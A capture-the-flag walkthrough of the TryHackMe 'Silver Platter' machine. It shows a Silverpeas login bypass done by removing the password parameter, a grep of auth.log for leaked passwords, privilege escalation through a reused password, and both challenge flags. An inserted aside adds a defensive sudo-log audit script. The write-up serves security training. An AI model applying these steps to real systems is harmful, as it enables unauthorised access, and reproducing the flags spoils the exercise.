SILVER PLATTER

Silver Platter @ TryHackMe

RustScan showed three ports open: 22, 80, and 8080.

rustscan -a 10.10.167.171

Open 10.10.167.171:22
Open 10.10.167.171:80
Open 10.10.167.171:8080

Visiting port 80, I found a new little website, but I did not see a lot going on. I did find a possible username, scr1ptkiddy, and an app named Silverpeas. I was not aware of the service Silverpeas. A quick Google search revealed that it is a type of social media document manager software.

I also went to port 8080, but the website only had a 404 message.  Running Gobuster did not bring up much. So, as a long shot, I thought I would manually try /silverpeas on both port 80 and port 8080.  Sure enough, port 8080 brought up a logon screen.

I tried a few basic passwords with admin and scr1ptkiddy, but no luck. I looked for any known vulnerabilities. I found a CVE-2023-31179 for authentication bypass, so that sounded promising. Firing up Burp Suite, it looks like all I have to do is remove the &password= field from the request, and it will bypass the login.

Login=SilverAdmin&Password=SilverAdmin&DomainId=0 (Before)
Login=SilverAdmin&DomainId=0 (After)

Trying this with the known user of scr1ptkiddy worked!! Looking around with the user, I did not find much. There was a message about game night. I tried a bunch of things, including another CVE, which I could not get to work at all. I opened the directory and noted the other users: one named Manager and the other named Administratuer.

I tried logging in with the administrator account spelled both ways, but I was greeted with an odd error of Technical Problem.  Now I will not go into the details of all the things I tried with no luck.  I later tried to log in with the Manager account using the same trick, and sure enough, it worked.  There were three messages, but only one mattered.

Sitting in the messages was the information for an SSH login with the user Tim and a password of cm0nt!md0ntf0rg3tth!spa$$w0rdagainlol

At this point, I was feeling pretty happy. I logged onto SSH and found the user.txt file.

THM{c4ca4238a0b923820dcc509a6f75849b}

I went ahead and created /tmp so I can upload LinPEAS with my Python server. I did not find a ton of things that worked. But I did see my user was in a group called adm.

So I ran a find command to see what files I could read/write to with that group:

uid=1001(tim) gid=1001(tim) groups=1001(tim),4(adm)

find / -group adm 2>/dev/null

/var/log/auth.log

I decided to grep auth.log to see if I could find any good information.

grep -i "sudo\|password\|pkexec\|tty" /var/log/auth.log*

/var/log/auth.log.2:Dec 13 15:40:33 silver-platter sudo: tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker run --name postgresql -d -e POSTGRES_PASSWORD=_Zd_zx7N823/ -v postgresql-data:/var/lib/postgresql/data postgres:12.3

/var/log/auth.log.2:Dec 12 19:31:36 silver-platter useradd[674]: add 'tyler' to group 'sudo'
/var/log/auth.log.2:Dec 12 19:31:36 silver-platter useradd[674]: add 'tyler' to shadow group 'sudo'

So we know the user Tyler is in the sudo group, and we have a database password. With any password I find, I always try it on a user just in case it was reused.

tim@silver-platter:/tmp$ su tyler
Password: 
tyler@silver-platter:/tmp$ 

Well, that was not expected, but that looks to be Tyler’s password.
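Seen from the defender's side, the finding above is a secret passed on a sudo command line and therefore written to auth.log, which the adm group can read. The following is an added example, not part of the original write-up, that audits sudo log lines for that pattern and reports the key name without re-logging the value; the secret-name heuristic, the function name, and the sample lines are constructed assumptions.

```python
import re

# sudo logs each call as: "sudo: <user> : TTY=... ; PWD=... ; USER=<target> ; COMMAND=<cmdline>"
SUDO_RE = re.compile(
    r"sudo(?:\[\d+\])?:\s+(?P<user>\S+)\s+:.*?USER=(?P<target>\S+)\s+;\s+COMMAND=(?P<cmd>.*)$"
)
# Assumed heuristic: NAME=value, or "--name value", where the name suggests a secret.
SECRET_RE = re.compile(
    r"(?P<env>[\w-]*(?:pass|secret|token)[\w-]*)=(?P<v1>\S+)"
    r"|(?P<flag>--[\w-]*(?:pass|secret|token)[\w-]*)\s+(?P<v2>\S+)",
    re.IGNORECASE,
)

def audit_sudo_log(lines):
    """Return one finding per secret-looking argument in a logged sudo command."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = SUDO_RE.search(line)  # search() tolerates a "file:" prefix from grep output
        if not m:
            continue
        for s in SECRET_RE.finditer(m["cmd"]):
            value = s["v1"] or s["v2"]
            findings.append({
                "line": lineno,
                "user": m["user"],
                "run_as": m["target"],
                "key": s["env"] or s["flag"],
                "value_len": len(value),  # report the length only, never the secret
            })
    return findings

# Constructed sample lines (not taken from the target machine).
SAMPLE = [
    "Dec 13 15:40:33 host1 sudo:    alice : TTY=tty1 ; PWD=/ ; USER=root ; "
    "COMMAND=/usr/bin/docker run --name db -d -e POSTGRES_PASSWORD=EXAMPLE-ONLY postgres:12.3",
    "Dec 13 15:41:02 host1 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; "
    "COMMAND=/usr/bin/passwd bob",
    "Dec 13 15:42:10 host1 sudo:    bob : TTY=pts/1 ; PWD=/tmp ; USER=root ; "
    "COMMAND=/usr/bin/mysql --password hunter2-example -e status",
    "Dec 13 15:43:00 host1 sshd[812]: Failed password for invalid user admin "
    "from 192.0.2.10 port 50022 ssh2",
]

if __name__ == "__main__":
    for f in audit_sudo_log(SAMPLE):
        print(f)
```

Any secret that turns up this way should be rotated and supplied through a file or secret store rather than the command line.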

So I ran sudo -l to see what he can run, and well, looks like everything 🙂

tyler@silver-platter:/tmp$ sudo -l
[sudo] password for tyler:

Matching Defaults entries for tyler on silver-platter:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User tyler may run the following commands on silver-platter:
    (ALL : ALL) ALL

cat /root/root.txt
THM{098f6bcd4621d373cade4e832627b4f6}